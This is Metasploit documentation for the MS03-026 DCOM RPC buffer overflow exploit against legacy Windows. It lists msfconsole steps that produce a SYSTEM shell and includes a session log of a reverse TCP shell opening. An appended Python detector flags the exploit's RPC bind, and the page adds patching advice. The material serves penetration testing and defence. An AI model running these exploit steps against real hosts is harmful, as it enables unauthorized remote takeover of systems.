
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/dcerpc/ms03_026_dcom.md

## Vulnerable Application

This module exploits a stack buffer overflow in the RPCSS service. The vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003, all in one request 😃

## Verification Steps

  1. Start `msfconsole`

  2. Do: `use exploit/windows/dcerpc/ms03_026_dcom`

  3. Do: `set rhosts <rhosts>`

  4. Do: `run`

  5. You should get a SYSTEM shell.

## Options

## Scenarios

### Windows 2000 Server SP4 (English)

```
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on 172.16.191.192:4444
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.164
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
-----

C:\WINNT\system32>
```
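The session output above shows the one observable the exploit cannot avoid: a DCE/RPC bind over TCP port 135 to interface `4d9f4ab8-7d1c-11cf-861e-0020af6e7c57` before the oversized request is sent. The following Python detector is an added example, not part of the module documentation or the Metasploit project; it walks constructed, Zeek-style tab-separated DCE/RPC records and flags that bind when it comes from outside an assumed trusted management range. The log format, the field order, the `TRUSTED_NETS` value and every address in `SAMPLE_LOG` are assumptions chosen for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Interface UUID the module binds to, taken from the msfconsole output
# on this page ("Binding to 4d9f4ab8-...@ncacn_ip_tcp:...[135]").
IREMOTEACTIVATION_UUID = "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57"
EPMAP_PORT = 135  # endpoint mapper / RPCSS port shown in the output

# Assumption: only this range is allowed to drive DCOM activation on the
# legacy hosts. Constructed value; adjust to the real management network.
TRUSTED_NETS = [ipaddress.ip_network("172.16.191.0/24")]


@dataclass
class BindEvent:
    ts: str
    src: str
    dst: str
    dport: int
    endpoint: str  # interface UUID, normalised to lower case


def parse_line(line: str) -> Optional[BindEvent]:
    """Parse one constructed, Zeek-style record:
    ts  orig_h  orig_p  resp_h  resp_p  endpoint_uuid  operation
    Header/comment lines (starting with '#') and malformed rows yield None."""
    if line.startswith("#"):
        return None
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 7:
        return None
    ts, src, _sport, dst, dport, endpoint, _op = fields
    return BindEvent(ts, src, dst, int(dport), endpoint.lower())


def is_suspicious(ev: Optional[BindEvent]) -> bool:
    """True when an untrusted source binds IRemoteActivation on port 135."""
    if ev is None:
        return False
    if ev.dport != EPMAP_PORT or ev.endpoint != IREMOTEACTIVATION_UUID:
        return False
    src = ipaddress.ip_address(ev.src)
    return not any(src in net for net in TRUSTED_NETS)


def scan(lines: List[str]) -> List[BindEvent]:
    """Return every record that should raise an alert."""
    return [ev for ev in map(parse_line, lines) if is_suspicious(ev)]


# Constructed sample log: one header, one untrusted bind (UUID in upper
# case to exercise normalisation), one trusted bind, one unrelated bind
# to a made-up interface on a different port.
SAMPLE_LOG = [
    "#fields\tts\torig_h\torig_p\tresp_h\tresp_p\tendpoint\toperation",
    "1638074000.1\t10.9.8.7\t1031\t192.0.2.10\t135\t"
    "4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57\tbind",
    "1638074001.2\t172.16.191.50\t1040\t192.0.2.10\t135\t"
    "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57\tbind",
    "1638074002.3\t10.9.8.7\t1032\t192.0.2.10\t445\t"
    "11111111-2222-3333-4444-555555555555\tbind",
]

if __name__ == "__main__":
    for ev in scan(SAMPLE_LOG):
        print(f"ALERT {ev.ts}: {ev.src} bound IRemoteActivation on "
              f"{ev.dst}:{ev.dport}")
```

The bind alone is also what a legitimate DCOM client does, so the trust list is what keeps the rule from paging on every remote activation; on hosts old enough to be affected, pairing this with the patch status from MS03-026 (or simply blocking 135/tcp from untrusted networks) is the more durable fix.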